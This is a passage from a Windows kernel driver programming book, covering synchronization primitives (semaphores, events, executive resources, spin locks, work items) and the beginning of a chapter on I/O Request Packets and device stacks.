is initialized with its maximum and initial count (typically set to the maximum value) by calling
KeInitializeSemaphore. While its internal count is greater than zero, the semaphore is signaled. A
thread that calls KeWaitForSingleObject has its wait satisfied, and the semaphore count drops by one.
This continues until the count reaches zero, at which point the semaphore becomes non-signaled.
Semaphores use the KSEMAPHORE structure to hold their state, which must be allocated from non-paged
memory. Here is the definition of KeInitializeSemaphore:
VOID KeInitializeSemaphore (
    _Out_ PRKSEMAPHORE Semaphore,
    _In_ LONG Count,     // starting count
    _In_ LONG Limit);    // maximum count
As an example, imagine a queue of work items managed by the driver. Some threads want to add items to
the queue. Each such thread calls KeWaitForSingleObject to obtain one “count” of the semaphore. As
long as the count is greater than zero, the thread continues and adds an item to the queue, increasing its
length, and the semaphore “loses” a count. Some other threads are tasked with processing work items from the
queue. Once a thread removes an item from the queue, it calls KeReleaseSemaphore that increments
the count of the semaphore, moving it to the signaled state again, allowing potentially another thread to
make progress and add a new item to the queue.
KeReleaseSemaphore is defined like so:
LONG KeReleaseSemaphore (
_Inout_ PRKSEMAPHORE Semaphore,
_In_ KPRIORITY Increment,
_In_ LONG Adjustment,
_In_ BOOLEAN Wait);
The Increment parameter indicates the priority boost to apply to a thread whose wait on the semaphore
is satisfied. The details of how this boost works are described in the next chapter. Most drivers
should provide the value 1 (that's the default used by the kernel when a semaphore is released by the
user mode ReleaseSemaphore API). Adjustment is the value to add to the semaphore’s current count.
It’s typically one, but can be a higher value if that makes sense. The last parameter (Wait) indicates
whether a wait operation (KeWaitForSingleObject or KeWaitForMultipleObjects) immediately
follows (see the information bar in the mutex discussion above). The function returns the old count of the
semaphore.
Is a semaphore with a maximum count of one equivalent to a mutex? At first, it seems so,
but this is not the case. A semaphore lacks ownership, meaning one thread can acquire the
semaphore, while another can release it. This is a strength, not a weakness, as described in the
above example. A Semaphore’s purpose is very different from that of a mutex.
You can read the current count of the semaphore by calling KeReadStateSemaphore:
LONG KeReadStateSemaphore (_In_ PRKSEMAPHORE Semaphore);
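The semaphore semantics described above - signaled while the count is greater than zero, with each satisfied wait consuming one count - can be sketched in user-mode C++. This is a hand-rolled analog of KSEMAPHORE (the class and member names are invented for illustration); TryWait stands in for a zero-timeout KeWaitForSingleObject:

```cpp
#include <algorithm>
#include <mutex>

// user-mode analog of a kernel semaphore: signaled while _count > 0
class Semaphore {
public:
    Semaphore(int count, int limit) : _count(count), _limit(limit) {}

    // analog of a zero-timeout KeWaitForSingleObject
    bool TryWait() {
        std::lock_guard<std::mutex> lock(_mutex);
        if (_count == 0)
            return false;   // non-signaled: a real wait would block
        --_count;           // a satisfied wait consumes one count
        return true;
    }

    // analog of KeReleaseSemaphore with an Adjustment argument
    void Release(int adjustment = 1) {
        std::lock_guard<std::mutex> lock(_mutex);
        _count = std::min(_count + adjustment, _limit);
    }

    // analog of KeReadStateSemaphore
    int Count() {
        std::lock_guard<std::mutex> lock(_mutex);
        return _count;
    }

private:
    std::mutex _mutex;
    int _count, _limit;
};
```

Note the lack of ownership: any thread may call Release, regardless of which thread consumed a count - exactly the property that distinguishes a semaphore from a mutex.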
Event
An event encapsulates a boolean flag - either true (signaled) or false (non-signaled). The primary purpose
of an event is to signal something has happened, to provide flow synchronization. For example, if some
condition becomes true, an event can be set, and a bunch of threads can be released from waiting and
continue working on some data that perhaps is now ready for processing.
There are two types of events, the type being specified at event initialization time:
• Notification event (manual reset) - when this event is set, it releases any number of waiting threads,
and the event state remains set (signaled) until explicitly reset.
• Synchronization event (auto reset) - when this event is set, it releases at most one thread (no matter
how many are waiting for the event), and once released the event goes back to the reset (non-
signaled) state automatically.
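The difference between the two event types can be demonstrated with a small user-mode sketch - an analog of KEVENT built on std::condition_variable (the class and its Wait/Set/Reset members are invented for illustration; Wait takes a timeout and returns whether the wait was satisfied):

```cpp
#include <chrono>
#include <condition_variable>
#include <mutex>

// user-mode analog of KEVENT: notification (manual-reset) vs.
// synchronization (auto-reset) semantics
class Event {
public:
    Event(bool notification, bool initialState)
        : _notification(notification), _signaled(initialState) {}

    void Set() {
        std::lock_guard<std::mutex> lock(_mutex);
        _signaled = true;
        _cv.notify_all();
    }

    void Reset() {
        std::lock_guard<std::mutex> lock(_mutex);
        _signaled = false;
    }

    // returns true if the wait was satisfied before the timeout elapsed
    bool Wait(std::chrono::milliseconds timeout) {
        std::unique_lock<std::mutex> lock(_mutex);
        if (!_cv.wait_for(lock, timeout, [this] { return _signaled; }))
            return false;       // timed out while non-signaled
        if (!_notification)     // synchronization event: auto-reset,
            _signaled = false;  // releasing just this one waiter
        return true;
    }

private:
    std::mutex _mutex;
    std::condition_variable _cv;
    bool _notification, _signaled;
};
```

A notification event stays signaled after a satisfied wait until explicitly reset; a synchronization event goes back to non-signaled as soon as one wait is satisfied.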
An event is created by allocating a KEVENT structure from non-paged memory and then calling
KeInitializeEvent to initialize it, specifying the event type (NotificationEvent or Synchro-
nizationEvent) and the initial event state (signaled or non-signaled):
VOID KeInitializeEvent (
    _Out_ PRKEVENT Event,
    _In_ EVENT_TYPE Type,    // NotificationEvent or SynchronizationEvent
    _In_ BOOLEAN State);     // initial state (signaled=TRUE)
Notification events are called Manual-reset in user-mode terminology, while Synchronization events are
called Auto-reset. Despite the different names, the semantics are the same.
Waiting for an event is done normally with the KeWaitXxx functions. Calling KeSetEvent sets the event
to the signaled state, while calling KeResetEvent or KeClearEvent resets it (non-signaled state) (the
latter function being a bit quicker as it does not return the previous state of the event):
LONG KeSetEvent (
_Inout_ PRKEVENT Event,
_In_ KPRIORITY Increment,
_In_ BOOLEAN Wait);
VOID KeClearEvent (_Inout_ PRKEVENT Event);
LONG KeResetEvent (_Inout_ PRKEVENT Event);
Just like with a semaphore, setting an event allows providing a priority boost to the next successful wait
on the event.
Finally, the current state of an event (signaled or non-signaled) can be read with KeReadStateEvent:
LONG KeReadStateEvent (_In_ PRKEVENT Event);
Named Events
Event objects can be named (as can mutexes and semaphores). This can be used as an easy way
of sharing an event object with other drivers or with user-mode clients. One way of creating or
opening a named event is with the IoCreateSynchronizationEvent and
IoCreateNotificationEvent helper APIs:
PKEVENT IoCreateSynchronizationEvent(
    _In_ PUNICODE_STRING EventName,
    _Out_ PHANDLE EventHandle);

PKEVENT IoCreateNotificationEvent(
    _In_ PUNICODE_STRING EventName,
    _Out_ PHANDLE EventHandle);
These APIs create the named event object if it does not exist and set its state to signaled, or obtain another
handle to the named event if it does exist. The name itself is provided as a normal UNICODE_STRING and
must be a full path in the Object Manager’s namespace, as can be observed in the Sysinternals WinObj
tool.
These APIs return two values: the pointer to the event object (direct returned value) and an open handle in
the EventHandle parameter. The returned handle is a kernel handle, to be used by the driver only. The
functions return NULL on failure.
You can use the previously described events API to manipulate the returned event by address. Don’t
forget to close the returned handle (ZwClose) to prevent a leak. Alternatively, you can call ObRefer-
enceObject on the returned pointer to make sure it’s not prematurely destroyed and close the handle
immediately. In that case, call ObDereferenceObject when you’re done with the event.
Built-in Named Kernel Events
One use of the IoCreateNotificationEvent API is to gain access to a set of named event objects
the kernel provides in the \KernelObjects directory. These events provide various notifications of memory-related
status that may be useful to kernel drivers.
Figure 6-11 shows the named events in WinObj. Note that the lower symbolic links are actually events, as
these are internally implemented as Dynamic Symbolic Links (see more details at https://scorpiosoftware.
net/2021/04/30/dynamic-symbolic-links/).
Figure 6-11: Kernel Named Events
All the events shown in figure 6-11 are Notification events. Table 6-5 lists these events with their meaning.
Table 6-5: Named kernel events
Name                          Description
HighMemoryCondition           The system has lots of free physical memory
LowMemoryCondition            The system is low on physical memory
HighPagedPoolCondition        The system has lots of free paged pool memory
LowPagedPoolCondition         The system is low on paged pool memory
HighNonPagedPoolCondition     The system has lots of free non-paged pool memory
LowNonPagedPoolCondition      The system is low on non-paged pool memory
HighCommitCondition           The system has lots of free memory in RAM and paging file(s)
LowCommitCondition            The system is low on RAM and paging file(s)
MaximumCommitCondition        The system is almost out of memory, and no further increase in page file size is possible
Drivers can use these events as hints to either allocate more memory or free memory as required. The
following example shows how to obtain one of these events and wait for it on some thread (error handling
omitted):
UNICODE_STRING name;
RtlInitUnicodeString(&name, L"\\KernelObjects\\LowCommitCondition");
HANDLE hEvent;
auto event = IoCreateNotificationEvent(&name, &hEvent);
// on some driver-created thread...
KeWaitForSingleObject(event, Executive, KernelMode, FALSE, nullptr);
// free some memory if possible...
//
// close the handle
ZwClose(hEvent);
Write a driver that waits on all these named events and uses DbgPrint to indicate a signaled
event with its description.
Executive Resource
The classic synchronization problem of accessing a shared resource by multiple threads was dealt with by
using a mutex or fast mutex. This works, but mutexes are pessimistic, meaning they allow a single thread
to access a shared resource. That may be unfortunate in cases where multiple threads access a shared
resource by reading only.
In cases where it’s possible to distinguish data changes (writes) vs. just looking at the data (reading)
- there is a possible optimization. A thread that requires access to the shared resource can declare its
intentions - read or write. If it declares read, other threads declaring read can do so concurrently, improving
performance. This is especially useful if the shared data changes infrequently, i.e. there are considerably
more reads than writes.
Mutexes are by their very nature pessimistic locks, since they enforce one-thread-at-a-time execution.
They always work, but at the expense of possible performance gains from concurrency.
The kernel provides yet another synchronization primitive that is geared towards this scenario, known as
single writer, multiple readers. This object is the Executive Resource, another special object which is not a
dispatcher object.
Initializing an executive resource is done by allocating an ERESOURCE structure from non-paged pool
and calling ExInitializeResourceLite. Once initialized, threads can acquire either the exclusive
lock (for writes) using ExAcquireResourceExclusiveLite or the shared lock by calling
ExAcquireResourceSharedLite. Once done with the work, a thread releases the executive resource with
ExReleaseResourceLite (no matter whether it acquired it exclusively or not).
The requirement for using the acquire and release functions is that normal kernel APCs must be
disabled. This can be done with KeEnterCriticalRegion just before the acquire call, and then
KeLeaveCriticalRegion just after the release call. The following code snippet demonstrates that:
ERESOURCE resource;
void WriteData() {
KeEnterCriticalRegion();
ExAcquireResourceExclusiveLite(&resource, TRUE);   // wait until acquired
// Write to the data
ExReleaseResourceLite(&resource);
KeLeaveCriticalRegion();
}
Since these calls are so common when working with executive resources, there are functions that perform
both operations with a single call:
void WriteData() {
ExEnterCriticalRegionAndAcquireResourceExclusive(&resource);
// Write to the data
ExReleaseResourceAndLeaveCriticalRegion(&resource);
}
A similar function exists for shared acquisition, ExEnterCriticalRegionAndAcquireResourceShared.
Finally, before freeing the memory the resource occupies, call ExDeleteResourceLite to
remove the resource from the kernel's resource list:
NTSTATUS ExDeleteResourceLite(
_Inout_ PERESOURCE Resource);
You can query the number of waiting threads for exclusive and shared access of a resource with the
functions ExGetExclusiveWaiterCount and ExGetSharedWaiterCount, respectively.
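For completeness, a shared (reader) counterpart to the WriteData example above might look like this sketch (ReadData is an illustrative name):

```cpp
// Uses the same ERESOURCE 'resource' declared in the WriteData example.
void ReadData() {
    ExEnterCriticalRegionAndAcquireResourceShared(&resource);
    // Read the data (other shared acquirers may run concurrently)
    ExReleaseResourceAndLeaveCriticalRegion(&resource);
}
```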
There are other functions for working with executive resources for some specialized cases. Consult the
WDK documentation for more information.
Create appropriate C++ RAII wrappers for executive resources.
High IRQL Synchronization
The sections on synchronization so far have dealt with threads waiting for various types of objects. How-
ever, in some scenarios, threads cannot wait - specifically, when the processor’s IRQL is DISPATCH_LEVEL
(2) or higher. This section discusses these scenarios and how to handle them.
Let's examine an example scenario: a driver has a timer, set up with KeSetTimer, and uses a DPC to
execute code when the timer expires. At the same time, other functions in the driver, such as an
IRP_MJ_DEVICE_CONTROL dispatch routine (which runs at IRQL 0), may execute concurrently. If both these
functions need to access a shared resource (e.g. a linked list), they must synchronize access to prevent
data corruption.
The problem is that a DPC cannot call KeWaitForSingleObject or any other waiting function - calling
any of these is fatal. So how can these functions synchronize access?
The simple case is where the system has a single CPU. In this case, when accessing the shared resource, the
low IRQL function just needs to raise IRQL to DISPATCH_LEVEL and then access the resource. During
that time a DPC cannot interfere with this code since the CPU’s IRQL is already 2. Once the code is done
with the shared resource, it can lower the IRQL back to zero, allowing the DPC to execute. This prevents
execution of these routines at the same time. Figure 6-12 shows this setup.
Figure 6-12: High-IRQL synchronization by manipulating IRQL
In standard systems, where there is more than one CPU, this synchronization method is not enough,
because IRQL is a per-CPU property, not a system-wide one. If one CPU's IRQL is raised to 2 and a
DPC needs to execute, it can run on another CPU whose IRQL may be zero. In that case, it's possible
that both functions execute at the same time, accessing the shared data and causing a data race.
How can we solve that? We need something like a mutex, but that can synchronize between processors -
not threads. That’s because when the CPU’s IRQL is 2 or higher, the thread itself loses meaning because
the scheduler cannot do work on that CPU. This kind of object exists - the Spin Lock.
The Spin Lock
The Spin Lock is just a bit in memory that is used with atomic test-and-set operations via an API. When
a CPU tries to acquire a spin lock, and that spin lock is not currently free (the bit is set), the CPU keeps
spinning on the spin lock, busy waiting for it to be released by another CPU (remember, putting the thread
into a waiting state cannot be done at IRQL DISPATCH_LEVEL or higher).
In the scenario depicted in the previous section, a spin lock would need to be allocated and initialized. Each
function that requires access to the shared data needs to raise IRQL to 2 (if not already there), acquire the
spin lock, perform the work on the shared data, and finally release the spin lock and lower IRQL back (if
applicable; not so for a DPC). This chain of events is depicted in figure 6-13.
Creating a spin lock requires allocating a KSPIN_LOCK structure from non-paged pool, and calling
KeInitializeSpinLock. This puts the spin lock in the unowned state.
Figure 6-13: High-IRQL synchronization with a Spin Lock
Acquiring a spin lock is always a two-step process: first, raise the IRQL to the proper level, which is the
highest level of any function trying to synchronize access to a shared resource. In the previous example, this
associated IRQL is 2. Second, acquire the spin lock. These two steps are combined by using the appropriate
API. This process is depicted in figure 6-14.
Figure 6-14: Acquiring a Spin Lock
Acquiring and releasing a spin lock is done using an API that performs the two steps outlined in figure
6-14. Table 6-4 shows the relevant APIs and the associated IRQL for the spin locks they operate on.
Table 6-4: APIs for working with spin locks
IRQL                 Acquire function               Release function                 Remarks
DISPATCH_LEVEL (2)   KeAcquireSpinLock              KeReleaseSpinLock
DISPATCH_LEVEL (2)   KeAcquireSpinLockAtDpcLevel    KeReleaseSpinLockFromDpcLevel    (a)
Device IRQL          KeAcquireInterruptSpinLock     KeReleaseInterruptSpinLock       (b)
Device IRQL          KeSynchronizeExecution         (none)                           (c)
HIGH_LEVEL           ExInterlockedXxx               (none)                           (d)
Remarks on table 6-4:
(a) Can be called at IRQL 2 only. Provides an optimization that just acquires the spin lock without changing
IRQLs. The canonical scenario is calling these APIs within a DPC routine.
(b) Useful for synchronizing an ISR with any other function. Hardware-based drivers with an interrupt
source use these routines. The argument is an interrupt object (KINTERRUPT), of which the spin lock is
a part.
(c) KeSynchronizeExecution acquires the interrupt object's spin lock, calls the provided callback, and
releases the spin lock. The net effect is the same as calling the pair KeAcquireInterruptSpinLock /
KeReleaseInterruptSpinLock.
(d) A set of three functions for manipulating LIST_ENTRY-based linked lists. These functions use the
provided spin lock and raise IRQL to HIGH_LEVEL. Because of the high IRQL, these routines can be used
at any IRQL, since raising IRQL is always a safe operation.
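As a sketch of the scenario from the previous section, a spin lock protecting a linked list shared between an IRQL 0 dispatch routine and a DPC might look like this (names are illustrative; the lock and list must live in non-paged memory):

```cpp
KSPIN_LOCK g_Lock;    // initialized once with KeInitializeSpinLock
LIST_ENTRY g_Head;    // initialized once with InitializeListHead

// Called at IRQL 0 (e.g. from an IRP_MJ_DEVICE_CONTROL handler)
void InsertItem(PLIST_ENTRY item) {
    KIRQL oldIrql;
    KeAcquireSpinLock(&g_Lock, &oldIrql);  // raises IRQL to 2 and acquires
    InsertTailList(&g_Head, item);
    KeReleaseSpinLock(&g_Lock, oldIrql);   // releases and restores IRQL
}

// Called from the DPC routine (already at IRQL 2)
void ProcessItems() {
    KeAcquireSpinLockAtDpcLevel(&g_Lock);  // remark (a): no IRQL change
    // ... walk or drain the list ...
    KeReleaseSpinLockFromDpcLevel(&g_Lock);
}
```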
If you acquire a spin lock, be sure to release it in the same function. Otherwise, you’re risking
a deadlock or a system crash.
Where do spin locks come from? The scenario described here requires the driver to allocate its
own spin lock to protect concurrent access to its own data from high-IRQL functions. Some spin
locks exist as part of other objects, such as the KINTERRUPT object used by hardware-based
drivers that handle interrupts. Another example is a system-wide spin lock known as the Cancel
spin lock, which is acquired by the kernel before calling a cancellation routine registered by a
driver. This is the only case where a driver releases a spin lock it has not explicitly acquired.
If several CPUs try to acquire the same spin lock at the same time, which CPU gets the spin lock
first? Normally, there is no order - the CPU with the fastest electrons wins :). The kernel does provide
an alternative, called Queued spin locks, which serve CPUs on a FIFO basis. These only work
at IRQL DISPATCH_LEVEL. The relevant APIs are KeAcquireInStackQueuedSpinLock
and KeReleaseInStackQueuedSpinLock. Check the WDK documentation for more details.
Write a C++ wrapper for a DISPATCH_LEVEL spin lock that works with the Locker RAII class
defined earlier in this chapter.
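For reference, a generic Locker similar to the RAII class the exercise refers to follows a standard pattern. The sketch below is plain C++ and illustrative - the lock type and its Lock/Unlock interface are assumptions, not WDK definitions; a DISPATCH_LEVEL spin lock wrapper would implement Lock/Unlock around KeAcquireSpinLock/KeReleaseSpinLock and store the returned old IRQL as a member.

```cpp
// Generic RAII locker: acquires in the constructor, releases in the
// destructor, so the lock is freed on every exit path from a scope.
// TLock is any type exposing Lock() and Unlock() member functions.
template<typename TLock>
struct Locker {
    explicit Locker(TLock& lock) : _lock(lock) {
        _lock.Lock();
    }
    ~Locker() {
        _lock.Unlock();
    }
    // non-copyable: exactly one release per acquire
    Locker(const Locker&) = delete;
    Locker& operator=(const Locker&) = delete;

private:
    TLock& _lock;
};
```

A hypothetical SpinLock wrapper type would then be used as `Locker<SpinLock> locker(myLock);` inside a dispatch routine or DPC.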
Queued Spin Locks
A variant on classic spin locks are queued spin locks. These behave the same as normal spin locks, with
the following differences:
• Queued spin locks always raise to IRQL DISPATCH_LEVEL (2). This means they cannot be used for
synchronizing with an ISR, for example.
• There is a queue of CPUs waiting to acquire the spin lock, served on a FIFO basis. This is more efficient
when high contention is expected. Normal spin locks provide no guarantee as to the order of acquisition
when multiple CPUs attempt to acquire a spin lock.
A queued spin lock is initialized just like a normal spin lock (KeInitializeSpinLock). Acquiring and
releasing a queued spin lock is achieved with different APIs:
void KeAcquireInStackQueuedSpinLock (
    _Inout_ PKSPIN_LOCK SpinLock,
    _Out_ PKLOCK_QUEUE_HANDLE LockHandle);

void KeReleaseInStackQueuedSpinLock (
    _In_ PKLOCK_QUEUE_HANDLE LockHandle);
In addition to the spin lock, the caller provides an opaque KLOCK_QUEUE_HANDLE structure that is filled in by
KeAcquireInStackQueuedSpinLock. The same structure must be passed to
KeReleaseInStackQueuedSpinLock.
Just like with normal dispatch-level spin locks, shortcuts exist if the caller is already at IRQL
DISPATCH_LEVEL. KeAcquireInStackQueuedSpinLockAtDpcLevel acquires the spin lock with no
IRQL changes, while KeReleaseInStackQueuedSpinLockFromDpcLevel releases it.
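Usage is a short sketch like the following (the lock lives in non-paged memory; names are illustrative):

```cpp
KSPIN_LOCK g_QueuedLock;   // initialized once with KeInitializeSpinLock

void AccessSharedData() {
    KLOCK_QUEUE_HANDLE lockHandle;   // per-acquisition, lives on the stack
    KeAcquireInStackQueuedSpinLock(&g_QueuedLock, &lockHandle);
    // access the shared data at IRQL DISPATCH_LEVEL...
    KeReleaseInStackQueuedSpinLock(&lockHandle);
}
```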
Write a C++ RAII wrapper for a queued spin lock.
Work Items
Sometimes there is a need to run a piece of code on a different thread than the executing one. One
way to do that is to create a thread explicitly and task it with running the code. The kernel provides
functions that allow a driver to create a separate thread of execution: PsCreateSystemThread and
IoCreateSystemThread (available in Windows 8+). These functions are appropriate if the driver needs
to run code in the background for a long time. However, for time-bound operations, it’s better to use a
kernel-provided thread pool that will execute your code on some system worker thread.
PsCreateSystemThread and IoCreateSystemThread are discussed in chapter 8.
IoCreateSystemThread is preferred over PsCreateSystemThread, because it allows
associating a device or driver object with the thread. This makes the I/O system add a reference
to the object, which ensures the driver cannot be unloaded prematurely while the thread is
still executing.
A driver-created thread must terminate itself eventually by calling
PsTerminateSystemThread. This function never returns if successful.
Work item is the term used to describe a function queued to the system thread pool. A driver can allocate
and initialize a work item, pointing to the function the driver wishes to execute, and then queue the work
item to the pool. This may seem very similar to a DPC, the primary difference being that work items
always execute at IRQL PASSIVE_LEVEL (0). Thus, work items can be used by IRQL 2 code (such as
DPCs) to perform operations not normally allowed at IRQL 2 (such as I/O operations).
Creating and initializing a work item can be done in one of two ways:
• Allocate and initialize the work item with IoAllocateWorkItem. The function returns a pointer
to an opaque IO_WORKITEM. When finished with the work item, it must be freed with
IoFreeWorkItem.
• Allocate an IO_WORKITEM structure dynamically, with the size provided by IoSizeofWorkItem.
Then call IoInitializeWorkItem. When finished with the work item, call
IoUninitializeWorkItem.
These functions accept a device object, so the I/O system can make sure the driver is not unloaded while
there is a work item queued or executing.
There is another set of APIs for work items, all starting with Ex, such as ExQueueWorkItem.
These functions do not associate the work item with anything in the driver, so it's possible
for the driver to be unloaded while a work item is still executing. These APIs are marked as
deprecated - always prefer using the Io functions.
To queue the work item, call IoQueueWorkItem. Here is its definition:
void IoQueueWorkItem(
    _Inout_ PIO_WORKITEM IoWorkItem,           // the work item
    _In_ PIO_WORKITEM_ROUTINE WorkerRoutine,   // the function to be called
    _In_ WORK_QUEUE_TYPE QueueType,            // queue type
    _In_opt_ PVOID Context);                   // driver-defined value
The callback function the driver needs to provide has the following prototype:
IO_WORKITEM_ROUTINE WorkItem;

void WorkItem(
    _In_ PDEVICE_OBJECT DeviceObject,
    _In_opt_ PVOID Context);
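Putting the pieces together, a sketch of the first (IoAllocateWorkItem) option might look like this (names and context are illustrative; error handling omitted):

```cpp
// Work item callback - runs at IRQL PASSIVE_LEVEL on a system worker thread
void MyWorkItemRoutine(PDEVICE_OBJECT DeviceObject, PVOID Context) {
    UNREFERENCED_PARAMETER(DeviceObject);
    UNREFERENCED_PARAMETER(Context);
    // perform work not allowed at IRQL 2 (e.g. I/O, paged memory access)...
}

// e.g. inside a DPC routine (IRQL 2):
PIO_WORKITEM workItem = IoAllocateWorkItem(deviceObject);
if (workItem)
    IoQueueWorkItem(workItem, MyWorkItemRoutine, DelayedWorkQueue, nullptr);

// later, when the work item is no longer needed:
// IoFreeWorkItem(workItem);
```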
The system thread pool has several queues (at least logically), based on the thread priorities that serve
these work items. There are several levels defined:
typedef enum _WORK_QUEUE_TYPE {
    CriticalWorkQueue,       // priority 13
    DelayedWorkQueue,        // priority 12
    HyperCriticalWorkQueue,  // priority 15
    NormalWorkQueue,         // priority 8
    BackgroundWorkQueue,     // priority 7
    RealTimeWorkQueue,       // priority 18
    SuperCriticalWorkQueue,  // priority 14
    MaximumWorkQueue,
    CustomPriorityWorkQueue = 32
} WORK_QUEUE_TYPE;
The documentation indicates DelayedWorkQueue must be used, but in reality, any other supported level
can be used.
There is another function that can be used to queue a work item: IoQueueWorkItemEx. This
function uses a different callback that has an added parameter which is the work item itself.
This is useful if the work item function needs to free the work item before it exits.
Summary
In this chapter, we looked at various kernel mechanisms driver developers should be aware of and use. In
the next chapter, we’ll take a closer look at I/O Request Packets (IRPs).
Chapter 7: The I/O Request Packet
After a typical driver completes its initialization in DriverEntry, its primary job is to handle requests.
These requests are packaged as the semi-documented I/O Request Packet (IRP) structure. In this chapter,
we’ll take a deeper look at IRPs and how a driver handles common IRP types.
In this chapter:
• Introduction to IRPs
• Device Nodes
• IRP and I/O Stack Location
• Dispatch Routines
• Accessing User Buffers
• Putting it All Together: The Zero Driver
Introduction to IRPs
An IRP is a structure that is allocated from non-paged pool typically by one of the “managers” in the
Executive (I/O Manager, Plug & Play Manager, Power Manager), but can also be allocated by the driver,
perhaps for passing a request to another driver. Whichever entity allocates the IRP is also responsible for
freeing it.
An IRP is never allocated alone. It’s always accompanied by one or more I/O Stack Location structures
(IO_STACK_LOCATION). In fact, when an IRP is allocated, the caller must specify how many I/O stack
locations need to be allocated with the IRP. These I/O stack locations follow the IRP directly in memory.
The number of I/O stack locations is the number of device objects in the device stack. We’ll discuss
device stacks in the next section. When a driver receives an IRP, it gets a pointer to the IRP structure
itself, knowing it's followed by a set of I/O stack locations, one of which is for the driver's use. To get the
correct I/O stack location, a driver calls IoGetCurrentIrpStackLocation (actually a macro). Figure
7-1 shows a conceptual view of an IRP and its associated I/O stack locations.
Figure 7-1: IRP and its I/O stack locations
The parameters of the request are somehow “split” between the main IRP structure and the current
IO_STACK_LOCATION.
Device Nodes
The I/O system in Windows is device-centric, rather than driver-centric. This has several implications:
• Device objects can be named, and handles to device objects can be opened. The CreateFile
function accepts a symbolic link that leads to a device object. CreateFile cannot accept a driver’s
name as an argument.
• Windows supports device layering - one device can be layered on top of another. Any request
destined for a lower device will reach the uppermost device first. This layering is common for
hardware-based devices, but it works with any device type.
Figure 7-2 shows an example of several layers of devices, “stacked” one on top of the other. This set of
devices is known as a device stack, sometimes referred to as a device node (although the term device node is
often used with hardware device stacks). Figure 7-2 shows six layers, or six devices. Each of these devices is
represented by a DEVICE_OBJECT structure created by calling the standard IoCreateDevice function.
Figure 7-2: Layered devices
The different device objects that comprise the device node (devnode) layers are labeled according to their
role in the devnode. These roles are relevant in a hardware-based devnode.
All the device objects in figure 7-2 are just DEVICE_OBJECT structures, each created by a different driver
that is in charge of that layer. More generically, this kind of device node does not have to be related to
hardware-based device drivers.
Here is a quick rundown of the meaning of the labels present in figure 7-2:
• PDO (Physical Device Object) - Despite the name, there is nothing “physical” about it. This device
object is created by a bus driver - the driver that is in charge of the particular bus (e.g. PCI, USB,
etc.). This device object represents the fact that there is some device in that slot on that bus.
• FDO (Functional Device Object) - This device object is created by the “real” driver; that is, the driver
typically provided by the hardware’s vendor that understands the details of the device intimately.
• FiDO (Filter Device Object) - These are optional filter devices created by filter drivers.
The Plug & Play (P&P) manager, in this case, is responsible for loading the appropriate drivers, starting
from the bottom. As an example, suppose the devnode in figure 7-2 represents a set of drivers that manage
a PCI network card. The sequence of events leading to the creation of this devnode can be summarized as
follows:
1. The PCI bus driver (pci.sys) recognizes the fact that there is something in that particular slot. It
creates a PDO (IoCreateDevice) to represent this fact. The bus driver has no idea whether this is a
network card, video card, or something else; it only knows there is something there and can extract
basic information from its controller, such as the Vendor ID and Device ID of the device.
2. The PCI bus driver notifies the P&P manager that it has changes on its bus.
3. The P&P manager requests a list of PDOs managed by the bus driver. It receives back a list of PDOs,
in which this new PDO is included.
4. Now the P&P manager's job is to find and load the proper driver for that new PDO. It issues a query to
the bus driver to request the full hardware device ID.
5. With this hardware ID in hand, the P&P manager looks in the Registry at
HKLM\System\CurrentControlSet\Enum\PCI\(HardwareID). If the driver has been loaded before, it will be
registered there, and the P&P manager will load it. Figure 7-3 shows an example hardware ID in the
registry (NVIDIA display driver).
6. The driver loads and creates the FDO (another call to IoCreateDevice), but adds an additional
call to IoAttachDeviceToDeviceStack, thus attaching itself over the previous layer (typically
the PDO).
We’ll see how to write filter drivers that take advantage of IoAttachDeviceToDeviceStack in
chapter 13.
Figure 7-3: Hardware ID information
The value Service in figure 7-3 indirectly points to the actual driver at
HKLM\System\CurrentControlSet\Services\{ServiceName}, where all drivers must be registered.
The filter device objects are loaded as well, if they are registered correctly in the Registry. Lower filters
(below the FDO) load in order, from the bottom. Each filter driver loaded creates its own device object and
attaches it on top of the previous layer. Upper filters work the same way but are loaded after the FDO. All
this means that with operational P&P devnodes, there are at least two layers - PDO and FDO, but there
could be more if filters are involved. We’ll look at basic filter development for hardware-based drivers in
chapter 13.
Full discussion of Plug & Play and the exact way this kind of devnode is built is beyond the scope of this
book. The previous description is incomplete and glosses over some details, but it should give you the
basic idea. Every devnode is built from the bottom up, regardless of whether it is related to hardware or
not.
Lower filters are searched in two locations: the hardware ID key shown in figure 7-3 and the corresponding
class key, based on the ClassGuid value, listed under HKLM\System\CurrentControlSet\Control\Classes.
The value name itself is LowerFilters and is a multi-string value holding service names, pointing to
the same Services key. Upper filters are searched in a similar manner, but the value name is UpperFilters.
Figure 7-4 shows the registry settings for the DiskDrive class, which has a lower filter and an upper filter.
Figure 7-4: The DiskDrive class key
IRP Flow
Figure 7-2 shows an example devnode, whether related to hardware or not. An IRP is created by one of
the managers in the Executive - for most of our drivers that is the I/O Manager.
The manager creates an IRP with its associated IO_STACK_LOCATIONs - six in the example in figure 7-2.
The manager initializes the main IRP structure and the first I/O stack location only. Then it passes the
IRP’s pointer to the uppermost layer.
A driver receives the IRP in its appropriate dispatch routine. For example, if this is a Read IRP, the
driver will be called through the IRP_MJ_READ index of the MajorFunction array in its driver object. At
this point, a driver has several options for dealing with the IRP:
• Pass the request down - if the driver’s device is not the last device in the devnode, the driver can
pass the request along if it’s not interesting for the driver. This is typically done by a filter driver
that receives a request that it’s not interested in, and in order not to hurt the functionality of the
device (since the request is actually destined for a lower-layer device), the driver can pass it down.
This must be done with two calls:
– Call IoSkipCurrentIrpStackLocation to make sure the next device in line is going to
see the same information given to this device - it should see the same I/O stack location.
– Call IoCallDriver passing the lower device object (which the driver received at the time it
called IoAttachDeviceToDeviceStack) and the IRP.
Before passing the request down, the driver must prepare the next I/O stack location with proper
information. Since the I/O manager only initializes the first I/O stack location, it’s the responsibility of
each driver to initialize the next one. One way to do that is to call IoCopyIrpStackLocationToNext
before calling IoCallDriver. This works, but is a bit wasteful if the driver just wants the lower
layer to see the same information. Calling IoSkipCurrentIrpStackLocation is an optimization
that decrements the current I/O stack location pointer inside the IRP, which is later incremented
by IoCallDriver, so the next layer sees the same IO_STACK_LOCATION this driver has seen. This
decrement/increment dance is more efficient than making an actual copy.
• Handle the IRP fully - the driver receiving the IRP can just handle the IRP without propagating it
down by eventually calling IoCompleteRequest. Any lower devices will never see the request.
• Do a combination of the above options - the driver can examine the IRP, do something (such as log
the request), and then pass it down. Or it can make some changes to the next I/O stack location, and
then pass the request down.
• Pass the request down (with or without changes) and be notified when the request completes by
a lower layer device - Any layer (except the lowest one) can set up an I/O completion routine
by calling IoSetCompletionRoutine before passing the request down. When one of the lower
